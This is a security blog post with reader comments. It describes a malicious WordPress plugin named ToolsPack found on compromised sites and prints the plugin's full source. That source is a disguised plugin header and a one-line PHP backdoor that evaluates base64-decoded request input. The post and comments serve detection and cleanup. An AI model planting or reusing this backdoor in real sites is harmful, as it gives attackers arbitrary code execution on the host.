New WordPress ToolsPack Plugin

We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.

They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”

Interesting…

However, when we look at the plugin code, all it does is this:

<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!

How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.

Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.

Have you seen this plugin, or something like it? make sure to leave a comment with your experience.


Site is hacked? Not sure? Check here http://sitecheck.sucuri.net

37 comments
  1. I found this plugin on one of my sites on 2/13. It appears to have gotten installed over the weekend. I found that the plugin was executed twice over the weekend. Index.php in the root folder along with wp-contents folder had been altered to include a malware script that related to JS/Blacole.BV. I have not found any other altered files.

    1. This sounds like what I went through about 2 weeks ago. It attacked all
      index files with a chunk of malicious code. I was told it was attached
      to the shell on a WP install. It executed twice over the same weekend Bob mentioned. That particular WP site was one page — it was on hold for a client who had stopped the project. After I cleaned up the malware, I canned all wp files. I didn’t bother to check the plugins page before doing this.

  2. hello, be carefully , this thing attacks all index.php/html/html files and adds there few lines of another malware..

  3. My Clients Site hacked yesterday and now removing malware code from it..
    should i directly delete plugin files and un install it via wp-admin

  4. Yep, just removed this plugin and the code it added to all my index.php files, IP address of attacker was  83.69.224.227 Russia….. So angry, have cleaned this site 5 times now, Google has blacklisted it now too, I have just installed a block Country Plugin….All of Russia is now blocked…….

  5. Thanks for this, I had no idea what was going on.
    Little new to this, how do I clean up this malware properly? I’ve deleted the folder toolspack which was in the plugins folder, reinstalled wordpress and changed all the passwords.

  6. I found p_music_player beside the ToolsPack in some of my clients websites. I check where the attacker come. He didn’t make any exploit attack. He use tools to find any WordPress website with user admin:admin or maybe another weak password. So change your weak password

  7. Backdoor attacks have been coming in for the past 7 days. This effer indeed left a backdoor. Thankfully, I had them sealed. Those struck in February, be on the look out!

  8. I’ve seen this plugin several times. In most of the cases I’ve seen the WordPress was “hacked” because of Admin account weak credentials, thus the user was able to upload such a plugin. Quite smart!

Comments are closed.

You May Also Like